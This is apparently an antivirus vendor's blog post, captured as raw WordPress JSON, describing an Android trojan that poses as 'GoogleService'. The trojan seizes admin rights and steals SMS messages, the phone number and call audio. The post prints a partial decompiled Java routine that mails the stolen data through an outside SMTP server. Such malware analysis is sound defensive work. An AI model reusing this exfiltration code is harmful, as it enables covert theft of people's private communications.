What is it and What does it do?<\/b><\/p>\n
– Android.Agentsmtp is a Trojan.<\/p>\n
– It gets installed in the victim\u2019s device as a genuine application that mimics “GoogleService<\/b>“.<\/p>\n
Malware Activity<\/span><\/b>:<\/b><\/p>\n This is how Android SMTP functions once it is installed:<\/b><\/p>\n –<\/b> Once Android.AgentSmtp is launched, it keeps asking the user to grant “Device Admin Right”. – The screen displays two options – “Activate<\/b>” and “Cancel<\/b> “<\/p>\n – Even if the user selects \u201cCancel<\/b>\u201d, the malicious application takes the administrator rights anyway.<\/p>\n Some More Facts:<\/span><\/b><\/p>\n – When any application gains Admin Right<\/b>, it enables the check box of the following location:<\/p>\n Setting -> Security -> Device Administrators -> Apps Name<\/b><\/p>\n – After gaining admin privileges, the application performs the following activities, without the victim’s knowledge:<\/p>\n 1<\/strong>. Collects phone number<\/p>\n 2<\/strong>. Collects SMS<\/p>\n 3<\/strong>. Records audio – it even keeps track of start call and stop call<\/p>\n 4<\/strong>. It sends all the stolen information to SMTP server smtp.126.com<\/p>\n \u00a0 Malicious Code<\/span><\/b>:<\/b><\/p>\n The following is the malicious code snippet of this malware:<\/em><\/p>\n this.from = new InternetAddress(this.sendMail);<\/p>\n this.message.setFrom(this.from);<\/p>\n this.to = new InternetAddress(this.tto);<\/p>\n public boolean send(String paramString1, String paramString2, String paramString3)<\/p>\n {<\/p>\n try<\/p>\n {<\/p>\n this.tto += Smsbody.mail;<\/p>\n this.props = new Properties();<\/p>\n this.props.put(“mail.smtp.host”, this.sendMailPath);<\/p>\n this.props.put(“mail.smtp.auth”, “true”);<\/p>\n this.s = Session.getInstance(this.props);<\/p>\n this.s.setDebug(true);<\/p>\n System.out.println(this.tto);<\/p>\n this.message = new MimeMessage(this.s);<\/p>\n this.from = new InternetAddress(this.sendMail);<\/p>\n this.message.setFrom(this.from);<\/p>\n this.to = new InternetAddress(this.tto);<\/p>\n this.message.setRecipient(Message.RecipientType.TO, this.to);<\/p>\n this.message.setSubject(paramString2);<\/p>\n System.out.println(“111” + paramString3);<\/p>\n this.message.setSentDate(new Date());<\/p>\n this.mp = new MimeMultipart();<\/p>\n this.mbpText = new MimeBodyPart();<\/p>\n this.mbpText.setDataHandler(new DataHandler(paramString1 + “—-” + paramString3, “text\/html;charset=utf-8”));<\/p>\n this.mp.addBodyPart(this.mbpText);<\/p>\n this.message.setContent(this.mp);<\/p>\n this.message.saveChanges();<\/p>\n this.transport = this.s.getTransport(“smtp”);<\/p>\n this.transport.connect(this.sendMailPath, this.sendName, this.sendPassword);<\/p>\n this.transport.sendMessage(this.message, this.message.getAllRecipients());<\/p>\n this.transport.close();<\/p>\n System.out.println(“\u53d1\u9001\u6210\u529f”);<\/p>\n return true;<\/p>\n }<\/p>\n Does Quick Heal Protect Android Devices from this Mobile Malware?<\/strong> After installing Quick Heal Mobile Security, take the following steps: <\/p>\n Blog post acknowledgment<\/em> \u2013 Quick Heal Threat Research and Response Team.<\/b><\/p>\n","protected":false},"excerpt":{"rendered":" Taking about new and sophisticated Android malware, we may have a winner. A malware that uses Simple Mail Transfer Protocol (SMTP) servers to send stolen information to the malware author has made its entry. When it comes to sophistication, this mobile malware is known to outrun most malware families. Part of the mobile malware\u2019s sophistication […]<\/p>\n","protected":false},"author":6,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[55,24],"tags":[380,586,650],"class_list":["post-76883","post","type-post","status-publish","format-standard","hentry","category-android","category-malware","tag-android-malware","tag-mobile-malware","tag-smtp"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/76883"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=76883"}],"version-history":[{"count":0,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/76883\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=76883"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=76883"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=76883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}![\"android-smtp-malware\"](\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2013\/09\/android-smtp-malware1.png\")
<\/a><\/p>\n
\n<\/b><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n
\nYes, Quick Heal Mobile Security is equipped with features that resolve infection caused by such malware. If you don’t have Quick Heal on your device, then you can get it from the Google Play Store<\/a>.<\/p>\n
\n1. Run a Full Scan on your device
\n2. If Quick Heal detects any such malicious issues (applications gaining admin privileges), it deactivates the admin rights and prompts the user to uninstall the application.<\/p>\n